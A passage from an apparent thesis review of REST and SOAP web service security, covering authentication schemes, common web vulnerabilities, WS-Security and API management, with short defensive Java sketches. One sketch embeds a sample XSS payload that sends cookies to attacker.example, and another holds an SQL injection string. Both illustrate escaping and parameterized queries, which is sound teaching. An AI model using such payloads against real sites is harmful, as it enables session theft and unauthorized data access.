Additionally, both HTTP basic and HTTP digest authentication methods need sessions to authenticate client messages. Servers have to store a session ID in order to run communication between the resource server and the clients. Without sessions, these authentication methods would have to authenticate every single request of a client each time, thereby wasting time as well as CPU and network resources (Nguyen, Tolsdorf and Iacono, 2017; Iacono, Nguyen and Gorski, 2019).
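
For illustration, the following sketch reproduces the basic digest computation of RFC 2617 (in its simplest form, without the qop extension). The realm, nonce and credentials below are placeholder values.

import java.security.MessageDigest;

public class DigestAuthSketch {

    static String md5Hex(String s) throws Exception {
        byte[] digest = MessageDigest.getInstance("MD5").digest(s.getBytes());
        StringBuilder hex = new StringBuilder();
        for (byte b : digest) hex.append(String.format("%02x", b));
        return hex.toString();
    }

    public static void main(String[] args) throws Exception {
        String username = "alice", realm = "arms@example.edu", password = "secretPassword";
        String nonce = "dcd98b7102dd2f0e8b11d0f600bfb0c0"; // issued by the server in its 401 challenge
        String method = "GET", uri = "/results/123";

        String ha1 = md5Hex(username + ":" + realm + ":" + password); // hash of the user credentials
        String ha2 = md5Hex(method + ":" + uri);                      // hash of the request line
        String response = md5Hex(ha1 + ":" + nonce + ":" + ha2);      // value sent in the Authorization header

        System.out.println("Digest response = " + response);
    }
}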

2.2.3 API-Keys

Application programming interface (API) keys are randomly generated strings which are negotiated out-of-band between client and server. An API-key is added to the URL or header of every request. According to an analysis of the web API directory ProgrammableWeb, API-keys are currently the most used authentication mechanism in REST-based web services (Iacono, Nguyen and Gorski, 2019). However, API-keys share the same drawbacks as HTTP basic authentication. Since the API-key is transferred to the server in plain text, the credentials are only protected during transit if transport-oriented security means such as TLS are being used. This makes the API-key vulnerable at both the client and server endpoints (Iacono, Nguyen and Gorski, 2019).
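
The two common ways of attaching an API-key, in the URL or in a request header, are sketched below. The key value, endpoint and the X-API-Key header name are assumptions made for illustration, as header naming conventions vary between providers.

import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;

public class ApiKeyExample {
    public static void main(String[] args) throws Exception {
        String apiKey = "f3a9c1d2e4b5a6978801"; // randomly generated string agreed out-of-band (placeholder)

        // Variant 1: key appended to the URL as a query parameter.
        HttpRequest viaUrl = HttpRequest.newBuilder()
                .uri(URI.create("https://api.example.edu/results?api_key=" + apiKey))
                .GET()
                .build();

        // Variant 2: key carried in a request header.
        HttpRequest viaHeader = HttpRequest.newBuilder()
                .uri(URI.create("https://api.example.edu/results"))
                .header("X-API-Key", apiKey)
                .GET()
                .build();

        HttpClient client = HttpClient.newHttpClient();
        // Either way, the key travels in plain text, so TLS is needed to protect it in transit.
        System.out.println(client.send(viaHeader, HttpResponse.BodyHandlers.ofString()).statusCode());
    }
}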

2.2.4 OAuth (Token-based Authentication) and OpenID Connect

OAuth is an authorization framework for granting third-party applications access to end users’ resources (Iacono, Nguyen and Gorski, 2019). The OAuth 2.0 specification (the latest version of OAuth) describes a system that allows an application to access resources (typically personal information) protected by a resource server on behalf of the resource owner, through the consumption of an access token issued by an authorization server (Li, Mitchell and Chen, 2019). In support of this system, the OAuth 2.0 architecture involves the following four roles:

i) The Resource Owner is typically an end user;
ii) The Client is a server which makes requests on behalf of the resource owner (the Client is the relying party (RP) when OAuth 2.0 is used for single sign-on);
iii) The Authorization Server generates access tokens for the client, after authenticating the resource owner and obtaining its authorization;
iv) The Resource Server stores the protected resources and consumes access tokens provided by an authorization server (this entity and the Authorization Server jointly constitute the Identity Provider (IdP) when OAuth 2.0 is used for single sign-on).

OpenID Connect builds an identity layer on top of the OAuth 2.0 protocol (Li, Mitchell and Chen, 2019). The added functionality enables RPs to verify an end user identity by relying on an authentication process performed by an OpenID Provider (OP). In order to enable an RP to verify the identity of an end user, OpenID Connect adds a new type of token to OAuth 2.0, namely the id_token. This complements the access token and code, which are already part of OAuth 2.0. An id_token contains claims about the authentication of an end user by an OP, together with any other claims requested by the RP.
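
For illustration, the sketch below shows how a client presents an access token, previously issued by an authorization server, to a resource server as a bearer token (RFC 6750). The token value and endpoint are placeholders.

import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;

public class BearerTokenExample {
    public static void main(String[] args) throws Exception {
        // Placeholder token; in OAuth 2.0 it would have been issued by the authorization server
        // after the resource owner granted authorization (e.g. via the authorization code flow).
        String accessToken = "placeholder-access-token";

        HttpRequest request = HttpRequest.newBuilder()
                .uri(URI.create("https://resource.example.edu/userinfo")) // hypothetical resource server
                .header("Authorization", "Bearer " + accessToken)          // bearer token usage
                .GET()
                .build();

        HttpResponse<String> response = HttpClient.newHttpClient()
                .send(request, HttpResponse.BodyHandlers.ofString());
        System.out.println(response.statusCode()); // 401/403 if the token is missing, expired or insufficient
    }
}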

However, OAuth 2.0 and OpenID Connect have vulnerabilities such as:

i) privacy leak issues, which might occur when an RP deliberately sends user tokens to a third party;
ii) impersonation attacks;
iii) CSRF (Cross-Site Request Forgery) attacks, where an attacker controls a victim user's RP account without knowledge of their username or password;
iv) authorization flow misuse, where RPs submit a combination of code, access token and id_token back to their Google sign-in endpoint, which can lead to serious vulnerabilities;
v) unsafe token transfers, which result from RPs not using HTTPS to protect the Google sign-in data transfers;
vi) the covert redirect vulnerability, where an attacker can forge a login page in order to capture the user's credentials, or redirect the URI to get a client's ID and password (Lee, Jo and Kim, 2017; Li, Mitchell and Chen, 2019).

2.2.5 ID-based Authentication (IBA)

Generally, all current authentication methods for REST require additional steps, for example, redirection in OAuth, storage of a session key, or storage of the ID and password in HTTP authentication. Those requirements make it difficult to maintain the statelessness of a RESTful Web service. The inability of these methods to maintain the statelessness of clients exposes client information to attackers.

As a solution, Lee, Jo and Kim (2017) proposed a new method, IBA, that does not store the client's state. The proposed method is a lightweight, stateless authentication mechanism for REST using ID-based cryptography, which they call ID-based authentication (IBA). In IBA, the receiving machine’s URI is virtually a public key, so there is no need to exchange public keys separately. If a client knows the URI of the resource server (RS), the client can derive the public key of the RS from the URI and the master public key, and vice versa. They can also sign messages for mutual authentication using their own private keys. Therefore, both the RS and the client can authenticate each other using only their URIs.

In their analysis of IBA, Iacono, Nguyen and Gorski (2019) commend the approach for ensuring authenticity, integrity and confidentiality of the whole HTTP message, as both requests and responses are protected by the scheme. However, the encryption of the whole message, with the aim that only the endpoints are able to decrypt and interpret it, violates the self-descriptive constraint of REST messages. With only the client and the server able to understand the intention of the message, intermediate systems have no ability to process the fully encrypted and signed message. Therefore, if an intermediary is unable to understand and process a traversing message, it may refuse to forward the message or cancel the communication. Another shortcoming of IBA is a missing time-variant parameter in the signature process, which makes the scheme vulnerable to replay attacks (Iacono, Nguyen and Gorski, 2019). Moreover, De Backere et al. (2014) further caution that the use of these URIs to transfer important data may result in privacy breaches as data is not anonymized.

2.3 Vulnerabilities to RESTful Web Services

2.3.1 Cross-Site Scripting (XSS) attack

XSS is the topmost vulnerability found in web applications today (Gupta and Gupta, 2017). A web application is vulnerable to XSS attacks when malicious content can flow into web responses without being fully sanitized (Li and Xue, 2014). This allows the attacker to execute malicious scripts in victims’ browsers, since the web browser trusts the contents returned by the web application under the same-origin policy. Common consequences of XSS attacks include the disclosure of users’ sensitive information, such as cookie details and credit card information. XSS also frequently serves as the first step that enables more sophisticated attacks (e.g., the notorious MySpace Samy worm).

According to Li and Xue (2014), there are several variants of XSS attacks based on how the malicious scripts are injected. Reflected XSS is launched when the victim clicks a crafted web link, which echoes the XSS payload back through the web application and enables its execution. Persistent (second-order) XSS happens when the malicious scripts are sent to the application back-end database as, for example, forum posts and comments, and stored for a period of time. The malicious scripts are triggered later when the victim visits a web page that contains them. DOM-based XSS occurs when the malicious scripts are injected into the client-side JavaScript code for execution, without even being sent to the server side. It is worth noting that DOM-based XSS is extremely difficult to handle using only server-side defenses. This does not cover all types of XSS, as there are others left unmentioned (e.g., content sniffing XSS and CSS-based XSS).
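
A common server-side mitigation is to encode untrusted input before writing it into a response. The sketch below shows a minimal, hand-rolled HTML-escaping routine for illustration only; production systems would normally rely on a vetted encoding library, and DOM-based XSS still requires client-side care.

public class HtmlEscapeSketch {

    // Escapes the characters that allow untrusted input to break out of an HTML text context.
    static String escapeHtml(String untrusted) {
        StringBuilder out = new StringBuilder();
        for (char c : untrusted.toCharArray()) {
            switch (c) {
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '&':  out.append("&amp;");  break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#x27;"); break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    public static void main(String[] args) {
        String comment = "<script>document.location='http://attacker.example/?c='+document.cookie</script>";
        // The injected script is rendered as harmless text when echoed back inside an HTML page.
        System.out.println("<p>" + escapeHtml(comment) + "</p>");
    }
}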

2.3.2 Injection Attacks

When inputs are not sufficiently or correctly validated, attackers are able to craft malformed inputs which can alter program execution and gain unauthorized access to resources. Input validation vulnerability is a long-lived problem in software security (Li and Xue, 2014). Incorrect or insufficient input validation can invite a variety of attacks, such as buffer overflow attacks and code injection attacks (such as script and SQL injection). One of the most popular code injection attacks in Web applications is SQL injection. A web application is vulnerable to SQL injection attacks when malicious content can flow into SQL queries without being fully sanitized, which allows the attacker to trigger malicious SQL operations by injecting SQL keywords or operators. For example, the attacker can append a separate SQL query to the existing query, causing the application to drop an entire table or manipulate the returned result. Malicious SQL statements can be introduced into a vulnerable application using many different input mechanisms, including user inputs, cookies, and server variables. A special case of SQL injection is second-order SQL injection, where the attacker stores the malicious content in the database and triggers its execution at a later time. Second-order SQL injection is much more difficult to identify and can bypass insufficient sanitization functions. SQL injections can lead to authentication bypass, information disclosure, and other problems.
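
The sketch below contrasts a string-concatenated query with a parameterized one. The JDBC URL, credentials, table and column names are placeholders, and a suitable JDBC driver is assumed to be on the classpath.

import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.PreparedStatement;
import java.sql.ResultSet;

public class SqlInjectionSketch {
    public static void main(String[] args) throws Exception {
        String userInput = "' OR '1'='1"; // classic injection payload

        // VULNERABLE: the payload becomes part of the SQL text and changes the query logic.
        String unsafe = "SELECT * FROM students WHERE reg_no = '" + userInput + "'";
        System.out.println("Vulnerable query text: " + unsafe);

        // SAFER: the value is bound as a parameter, so it can never alter the query structure.
        try (Connection conn = DriverManager.getConnection("jdbc:mysql://localhost/arms", "user", "pass");
             PreparedStatement stmt = conn.prepareStatement("SELECT * FROM students WHERE reg_no = ?")) {
            stmt.setString(1, userInput);
            try (ResultSet rs = stmt.executeQuery()) {
                while (rs.next()) {
                    System.out.println(rs.getString("reg_no"));
                }
            }
        }
    }
}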

2.3.3 Cross-Site Request Forgery (CSRF)

CSRF refers to a type of Internet-based fraud in which a party's web browser is caused to perform an unwanted action at a target website (Amit, et al., 2011). In a typical example of CSRF, a bank customer using a web browser accesses a website that does not belong to the customer's bank and that contains malicious instructions placed there by an attacker. The malicious instructions cause the bank customer's browser to send a transaction request to the customer's bank without the bank customer's knowledge, such as a request to transfer funds from the bank customer's account to the attacker's account.
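
A widely used countermeasure is the synchronizer token: the server issues a random token with each form and rejects any state-changing request whose submitted token does not match the stored one. The sketch below is a simplified illustration; how the token is stored server-side and delivered to the form are details left out here.

import java.security.MessageDigest;
import java.security.SecureRandom;
import java.util.Base64;

public class CsrfTokenSketch {

    private static final SecureRandom RANDOM = new SecureRandom();

    // Issued by the server and embedded, for example, as a hidden field in the HTML form.
    static String issueToken() {
        byte[] bytes = new byte[32];
        RANDOM.nextBytes(bytes);
        return Base64.getUrlEncoder().withoutPadding().encodeToString(bytes);
    }

    // Constant-time comparison of the stored token against the one submitted with the request.
    static boolean isValid(String storedToken, String submittedToken) {
        return storedToken != null
                && submittedToken != null
                && MessageDigest.isEqual(storedToken.getBytes(), submittedToken.getBytes());
    }

    public static void main(String[] args) {
        String token = issueToken();
        System.out.println(isValid(token, token));    // true: legitimate form submission
        System.out.println(isValid(token, "forged")); // false: a cross-site forged request is rejected
    }
}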

2.3.4 Insecure Direct Object Reference

A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, a directory, or a database key (Caviglione, Coccoli and Merlo, 2014). Without proper checks, attackers can manipulate these references to access unauthorized data.

2.3.5 Parameter Tampering

The form processing performed by the browser mostly involves checking user-provided inputs for errors (Bisht, et al., 2010). For instance, an electronic commerce application accepting credit card payments requires the credit card expiry date to be valid (e.g., a date in the future and a valid month/day combination). Once the input data has been validated, it is sent to the server as part of an HTTP request, with inputs appearing as parameters to the request. A server accepting such a request may be vulnerable to attack if it assumes that the supplied parameters are valid (e.g., that the credit card has not yet expired). This assumption is indeed enforced by browser-side JavaScript; however, malicious users can circumvent client-side validation by disabling JavaScript, changing the code itself, or simply crafting an HTTP request by hand with any parameter values of the user’s choice. Servers with parameter tampering vulnerabilities are open to a variety of attacks (such as unauthorized access, SQL injection and cross-site scripting).
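
The defence is to repeat every validation on the server, so that disabling client-side JavaScript or hand-crafting the HTTP request does not bypass the rules. The sketch below re-validates a submitted card expiry date server-side; the MM/yyyy field format is an assumption made for illustration.

import java.time.DateTimeException;
import java.time.YearMonth;
import java.time.format.DateTimeFormatter;

public class ExpiryValidationSketch {

    // Server-side check of the expiry parameter, independent of any browser-side validation.
    static boolean isValidExpiry(String submitted) {
        try {
            YearMonth expiry = YearMonth.parse(submitted, DateTimeFormatter.ofPattern("MM/yyyy"));
            return !expiry.isBefore(YearMonth.now()); // must be the current month or later
        } catch (DateTimeException e) {
            return false;                             // malformed or impossible month/year combination
        }
    }

    public static void main(String[] args) {
        System.out.println(isValidExpiry("09/2031")); // accepted
        System.out.println(isValidExpiry("02/2015")); // rejected: already expired
        System.out.println(isValidExpiry("13/2031")); // rejected: invalid month
    }
}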

2.4 SOAP Security Mechanisms

SOAP is a messaging protocol that allows applications to communicate using HTTP and XML (Halili and Ramadani, 2018). Unlike REST, SOAP limits itself to the use of XML to provide a platform-independent, extensible format which can be transferred via various underlying protocols such as HTTP, JMS or SMTP (Gorski, et al., 2014; Halili and Ramadani, 2018).

In order to ensure confidentiality and integrity of XML documents, XML Encryption, XML Signature and the XML Key Management Specification (XKMS) were introduced by the W3C (World Wide Web Consortium).

XML Signature and XML Encryption are used to provide integrity and confidentiality respectively. Although these two standards are based on digital signatures and encryption, none of them define any new cryptographic algorithms (Nordbotten, 2009). Instead, XML Signature and XML Encryption define how to apply well established digital signature/encryption algorithms to XML. This includes:

i) A standardized way to represent signatures, encrypted data, and information about the associated key(s) in XML, independent of whether the signed/encrypted resource is an XML resource or not,
ii) The possibility to sign and/or encrypt selected parts of an XML document,
iii) The means to transform two logically equivalent XML documents, but with syntactic differences, into the same physical representation. This is referred to as canonicalization. In order to be able to verify the signature of an XML resource that has had its representation changed, but still has the same logical meaning, it is essential that canonicalization is performed as part of the XML signature creation and verification processes (Nordbotten, 2009).

As both XML Signature and XML Encryption rely on the use of cryptographic keys, key management is a prerequisite for their effective use on a larger scale. Therefore, the XML Key Management Specification (XKMS) was created to be suitable for use in combination with XML Signature and XML Encryption. XKMS basically defines simple Web services interfaces for key management, thereby hiding the complexity of traditional public key infrastructures (PKIs) from the clients.

In order to extend SOAP message security, OASIS (Organization for the Advancement of Structured Information Standards) defined the WS-Security specification (Gorski, et al., 2014). WS-Security is based on XML Encryption and XML Signature. WS-Security specifies how to apply XML Signature and XML Encryption to SOAP messages, effectively providing integrity and confidentiality to SOAP messages (or parts of SOAP messages). Multiple encryptions can be used within the same SOAP message. Therefore, different parts of a SOAP message may be encrypted for different receivers (Nordbotten, 2009).

[Illustration not included in this excerpt]

Figure 2: SOAP Web Service Security Stack (Gorski, et al., 2014)

Figure 2 illustrates the SOAP security stack with the defined specifications. In addition to providing confidentiality and integrity for SOAP messages, WS-Security also provides a mechanism to avoid replay attacks (i.e., timestamps) and a way to include security tokens in SOAP messages. Security tokens are typically used to provide authentication and authorization (Nordbotten, 2009).

WS-Security is only concerned with securing a single SOAP message or a single SOAP request/response exchange, with no notion of a communication session. In cases where multiple message exchanges are expected, WS-SecureConversation may be used to establish and maintain an authenticated context. The authenticated context is represented by a URI in a context token and consists of a shared secret that can be used for key derivation. WS-SecureConversation relies on WS-Trust to establish the security context. WS-SecureConversation is an OASIS standard that defines how a secure exchange of multiple messages has to be established in terms of a session (Gorski, et al., 2014). WS-Trust basically defines a framework for obtaining security tokens (including the context tokens used in WS-SecureConversation) and brokering of trust (Nordbotten, 2009; Iacono, Nguyen and Gorski, 2019).

With a range of Web services standards, interoperability becomes very difficult unless the communicating parties know what standards to use and how these standards are to be used. Web Services Policy provides the means by which service providers and clients can specify their interoperability requirements and capabilities. WS-SecurityPolicy can be viewed as an extension to Web Services Policy, defining how Web Services Policy can be used to specify requirements and capabilities regarding the use of WS-Security, WS-Trust, and WS-SecureConversation. For instance, a service provider may specify using WS-Policy/WS-SecurityPolicy that it requires certain message parts to be encrypted (Nordbotten, 2009; Gorski, et al., 2014; Iacono, Nguyen and Gorski, 2019).

The last two standards in SOAP are the Security Assertion Markup Language (SAML) and the eXtensible Access Control Markup Language (XACML). SAML is based on XML and may be used to communicate authentication, attribute, and authorization information in a trusted way. Though its original motivation was based on single sign-on for Web browsing, SAML is also well suited for use in Web services. XACML on the other hand is used to define access control policies in XML, and may be used to define access control policies for any type of resource. Because SAML and XACML are not targeted exclusively at Web services, SAML and XACML were not included in Figure 2 above. However, this does not imply that there is no interaction between these standards. A XACML implementation may for instance rely on the security tokens of WS-Security for authentication. As to security tokens, there is also a SAML based security token in WS-Security (Nordbotten, 2009).

2.5 Vulnerabilities to SOAP

Just like any distributed application running on the Internet, SOAP-based services suffer from the attack vectors common to this environment (Gorski, et al., 2014). The Web Services Description Language (WSDL), for example, is a standard for describing web service contracts. Usually, a WSDL service description is automatically generated by a web service framework, which uses conventions to generate the name of the service. An attacker can exploit this property by guessing the names of non-public services. Further issues can arise from the external entities feature of XML, with which data outside a document can be referenced by declaring a URI to it. So-called external entity attacks exploit this feature by including an external entity element with a URI referring to files within the file system of the service provider in order to access secret information. Moreover, an attacker can also include a URI to malicious code in the hope that the XML parser of the service provider executes it. Another variant of the external entity attack misleads the XML parser into accessing a URI whose endpoint never responds, keeping the XML parser waiting indefinitely with the aim of causing a denial of service.

A further well-known example of a denial-of-service attack against the XML parser is the so-called XML bomb. This attack is hidden in a valid XML document and causes the parser to expand a vast number of nested entities, which leads to an exponential growth of data to be processed and kept in memory, ultimately crashing or freezing the program that tries to parse the XML.
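As a defensive illustration only, the following minimal Java sketch shows how an XML parser configuration can be hardened against the external-entity and entity-expansion attacks described above; the class name is hypothetical, and the feature URIs follow the common JAXP/Xerces conventions.

import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;

public final class HardenedXmlParserFactory {

    // Returns a parser configuration that rejects DOCTYPE declarations and external
    // entities, which blocks external entity attacks and entity-expansion "XML bombs".
    public static DocumentBuilderFactory newHardenedInstance() throws ParserConfigurationException {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        return dbf;
    }
}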

XPath is a query language for accessing elements in XML documents. Applications which use XML to store data and XPath to address information might be vulnerable to malicious injections similar to SQL injection. If the application does not validate user-supplied input accurately, an attacker could exploit this flaw to bypass authentication or access data which is usually only accessible to privileged users. XML signature wrapping attacks involve injecting a forged XML node into a validly signed XML document. The attack succeeds because signature validation and the application logic that processes the payload are separated, so the signature verifier accepts the signature value of the XML while the forged node is processed. As one possible consequence, authorization mechanisms can be compromised. In order to prevent such attacks, a specific signature generation and verification procedure needs to be adhered to (Gorski, et al., 2014).
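To illustrate one common mitigation for XPath injection, the sketch below binds the user-supplied value as an XPath variable through the standard javax.xml.xpath API instead of concatenating it into the expression, analogous to a parameterised SQL query; the class, element and attribute names are assumptions.

import javax.xml.namespace.QName;
import javax.xml.xpath.XPath;
import javax.xml.xpath.XPathExpressionException;
import javax.xml.xpath.XPathFactory;
import org.w3c.dom.Document;

public final class SafeXPathLookup {

    // Looks up a user element without building the XPath expression from raw input.
    public static String findUserRole(Document doc, String userName) throws XPathExpressionException {
        XPath xpath = XPathFactory.newInstance().newXPath();
        // The resolver supplies the value of $username at evaluation time.
        xpath.setXPathVariableResolver(name ->
                new QName("username").equals(name) ? userName : null);
        return xpath.evaluate("//user[@name=$username]/role/text()", doc);
    }
}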

2.6 Comparison of REST-Security and SOAP-Security Mechanisms

WS-Security and its relatives have been established as a stable and overarching umbrella of standards for securing web services based on SOAP. SOAP-based Web services build on a variety of standards such as WSDL, WSBPEL, WS-Security and WS-Addressing (responsible for Web service and message addressing), among many others. These standards were developed by standardization organizations such as W3C and OASIS (Tihomirovs and Grabis, 2016). SOAP's comprehensive set of security standards makes it well suited for many applications, including mission-critical and business-critical systems with high security demands. The use of SOAP can be observed in various contemporary IT systems such as Cloud Computing, e-Health and identity infrastructures (Gorski, et al., 2014).

REST has become very popular in recent years, primarily in mobile applications where performance and usability are more important than security. However, SOAP is preferred over REST in applications that require stronger security, because REST lacks specified security standards. It should also be noted that the REST architectural style is yet to be standardized. Therefore, in order for REST-Security to close the gap with SOAP-Security, (Gorski, et al., 2014) proposed a roadmap to a comprehensive security framework comparable to the SOAP-Security stack.

[Figure not included in this excerpt]

Figure 3: Proposed RESTful Web Service Security Stack (Gorski, Iacono, Nguyen and Torkian, 2014)

Figure 3 shows the desired RESTful Web service security stack. The authors' methodology for achieving their goal of building a RESTful Web service security stack was to take the SOAP-based Web service security stack as a baseline. However, about five years later, the same authors observed that a plain adoption of WS-Security for REST and its instantiations is not feasible in a straightforward manner (Iacono, Nguyen and Gorski, 2019). Even though both security stacks have similarities, REST is a very general concept and needs to be handled accordingly. REST-Security needs to be a general framework composed of definitions, structures and rules on how to protect REST-based systems. Additionally, REST represents an abstract model; therefore, security components for this architectural style need to be considered and defined on the same abstraction layer. The abstraction layer of REST and its instantiations has to be taken into account first. Consequently, a simple mapping of the concrete WS-Security technologies to construct REST-Security is not feasible, since the two reside on different abstraction layers.

Previous analysis of the available standards and specifications shows that most of the desired security components are not yet available, as the white-colored boxes in Figure 3 emphasize (Gorski, et al., 2014). Further, the same authors report that there are no standardized means to define security policies, to implement trust and federation schemes, or to set up security sessions for multiple service invocations between the same pair of consumer and service. (Iacono, Nguyen and Gorski, 2019) report progress in the form of some available standards related to the authorization of service invocations, such as OAuth, and drafts on identity federation. However, the rest of the higher-order security concepts, such as the fundamental message security layer (signified by the hatched area in Figure 3), trust, secure conversation and so forth, are lacking entirely (Iacono, Nguyen and Gorski, 2019). Hence, to further support the growth of REST and to prepare the path for the adoption of REST in application domains with high security demands, a security stack as shown in Figure 3 needs to be developed and standardized.

2.7 API Management

Customers today want to have access to enterprise data and services through a variety of digital devices and channels (Thomas and Gupta, 2016). To meet customer expectations, enterprises need to open up their assets in an agile, flexible, secure and scalable manner. APIs form the window into an enterprise's data and services (De, 2017). They allow applications to easily communicate with each other using a lightweight protocol like HTTP. Developers use APIs to write applications that interact with the back-end systems. Once an API has been created, it needs to be managed using an API management platform (De, 2017).

An API management platform helps an organization publish APIs to internal, partner and external developers to unlock the unique potential of their assets. It provides the core capabilities to ensure a successful API program through developer engagement, business insights, analytics, security and protection. Such a platform helps businesses accelerate outreach across digital channels, drive partner adoption, monetize digital assets and provide analytics to optimize investments in digital transformation, and it enables APIs to be created, analyzed and managed in a secure and scalable environment. An API management platform should provide the following capabilities: developer enablement for APIs; secure, reliable and flexible communications; API lifecycle management; and API auditing, logging and analytics.

[Figure not included in this excerpt]

Figure 4: API Management Capabilities (De, 2017)

The API management capabilities shown in Figure 4 above can be delivered by any API management vendor in a public cloud as a hosted service or can be deployed on premise in a private cloud. A hybrid approach with some components of the API management platform being offered as a hosted solution and others deployed on premise for increased security and control can also be followed.

[Figure not included in this excerpt]

Figure 5: API Management Platform Services (De, 2017)

As illustrated in Figure 5, an API management platform provides these capabilities as three major types of services:

i) API gateway services allow you to create and manage APIs from existing data and services. They allow you to add security, traffic management, interface translation, orchestration and routing capabilities into your API.
ii) Analytics services monitor traffic from individual apps and provide business with insight and operational metrics, API and app performance and developer engagement metrics.
iii) Developer portals provide capabilities for developer and app registration and onboarding, API documentation, community management and API monetization.

2.7.1 Secure, Reliable and Flexible Communication

APIs help digital apps to communicate with back-end services. Communication forms the core of APIs. For communication to take place, APIs can make use of REST, SOAP, Plain Old XML (POX), or any other protocol of choice. REST is by far the most preferred communication protocol for APIs due to its inherent characteristics, which have already been discussed earlier in this chapter (De, 2017; Iacono, Nguyen and Gorski, 2019). An API management platform must provide a framework that allows secure, reliable and flexible channels of communication. The API gateway within the API management platform provides the services that form the core capabilities required for API communications.

2.7.1.1 API Gateway

An API gateway forms the heart of any API management solution that enables secure, flexible and reliable communication between the back-end services and digital apps. It helps to expose, secure and manage back-end data and services as RESTful APIs. It provides a framework to create a facade in front of the back-end services (IBM, n.d.). This facade intercepts API requests to enforce security, validate data, transform messages, throttle traffic, and finally route them to the back-end service. Static responses may be cached to improve performance. The API gateway can optionally orchestrate requests between multiple back-end services and also connect to databases to service the request. All of these functionalities can be implemented in a gateway, mostly through configurations and scripting extensions.

[Figure not included in this excerpt]

Figure 6: API Gateway Capabilities (De, 2017)

API Security: API security is one of the main features of an API gateway, and this gateway component enforces it. In that role, the API gateway applies configured policies to all traffic, including authentication, authorization, traffic management, routing, and other types of policies.

i) Encryption support: To increase mobile and API security for protecting mission- critical transactions, the API gateway provides JSON Encryption, JSON Signature, JSON Key, and JSON Token. It also protects mission-critical applications from security vulnerabilities with enhanced TLS protocol support using elliptic curve cryptography (ECC), Server Name Indication (SNI), and perfect forward secrecy (PFS).
ii) Policy authoring: To simplify policy authoring, the API gateway's pre-configured policies can be used to enable quick delivery of gateway capabilities without any custom policy authoring or coding.
iii) Open standards: From an openness standpoint, the API gateway provides flexible user authentication for single sign-on (SSO) to web, mobile, and API workloads using social (such as Google) or enterprise identities based on OpenID Connect.
iv) OAuth authorization standard: The API gateway supports OAuth. When you create an OAuth security definition in an API, you provide settings for controlling access to the API operations through the OAuth authorization standard. OAuth is a token-based authorization protocol that allows third-party websites or applications to access user data without requiring the user to share personal information.

2.7.2 API Lifecycle Management

There are four key phases in the lifecycle of an API, each of which requires a rich set of capabilities (IBM, n.d.).

1. Create phase

The create phase covers the development lifecycle: design, model, test, build, and deploy.

i) Rapid model-driven API creation: Create a model representing a resource that API management can use in a variety of ways, such as exposing it via a set of REST endpoints, persisting it to a data source (for example, in-memory or MySQL), or manipulating it programmatically as a JavaScript object.
ii) Data source to API mapping automation: Create models by discovering fields from existing database tables on various types of databases, such as MySQL, Oracle, PostgreSQL, and SQL Server.
iii) Standards-based visual API spec creation in Swagger 2.0: Create OpenAPI (Swagger 2.0) definition files for created APIs.
iv) Local API creation and testing: Empower developers to create and test APIs locally on their laptops and stage them to an on-premises or cloud deployment.
v) On-cloud and on-premises staging of APIs and packaging them into plans and products: Create products that include plans of created APIs and copy all files to the target, whether it is on premises or on cloud, without running the application (which only happens after publishing).

2. Run phase

This phase covers the performance, scalability, load and resilience of the API runtime platform.

i) Polyglot micro-services runtime: Create the micro-services by using unified Java and Node operations and management.
ii) Integrated runtime management for availability, load, and performance: Configure runtimes to meet runtime requirements.
iii) Enterprise high availability and scaling: Deploy multiple management servers and multiple gateway servers to achieve high availability, scalability, or resilience.
iv) On-cloud and on-premises staging of micro-services applications: Create the micro-service implementation and stage it to the target, whether on premises or on cloud, before making it available to application developers.

3. Manage phase

This phase covers the publicizing, socializing, management, governance, and cataloging of APIs as well as the user management of API consumers and providers. It also covers the monitoring, collection, and analysis of API metrics.

i) API discovery model: Publish APIs for application developers to find and use in their applications.
ii) API, plan, and product policy creation: If not already done during “Create” phase, create plans, products, and associate policies to them.
iii) API, plan, and product lifecycle management: Manage the lifecycle of APIs, plans, and products.
iv) API visibility via self-service, customizable developer portals: Control access to APIs, plans, and products so that they can only be accessed by authorized application developers.
v) Advanced analytics on API usage and performance metrics: Monitor the usage and performance of published APIs.
vi) Subscription and community management: Manage user accounts of application developers who can access the developer portal.

4. Secure phase:

The secure phase covers the runtime security enforcement of APIs in terms of authentication, authorization, rate limits, encryption, and creating proxies of APIs (IBM, n.d.).

i) Dynamic API policy enforcement: Dynamically associate a loosely-coupled policy to an API without needing to restart it or use late binding to associate policies at runtime.
ii) Enterprise security and gateway capability: Control and secure access to endpoints against threats and unauthorized usage.
iii) Quota management and rate limiting: Block access to APIs when an application behaves suspiciously, exceeds rate limits, or becomes compromised.
iv) Content-based routing: Configure the gateway to route based on a protocol such as HTTP, specific information, or a URL. Alternatively, program how matching is performed using a style sheet.
v) Response caching, load balancing, and offload processing: Cache response from API calls, load balance over multiple back ends, and perform processing on requests or responses to offload back ends using policies.

2.7.3 API Auditing, Logging and Analytics

Businesses need to have insight into their API programs to justify and make the right investments in building the right APIs. They need to understand how an API is used, know who is using it, and see the value generated from it (De, 2017). With proper insight, the business can then decide how to enhance that value, either by changing the API or by enriching it. An API gateway should provide the capability to measure, monitor and report API usage analytics. Good business-friendly dashboards for API analytics help measure and improve business value, and a monetization report on API usage is yet another desirable feature of an API management platform.

2.8 Conclusion

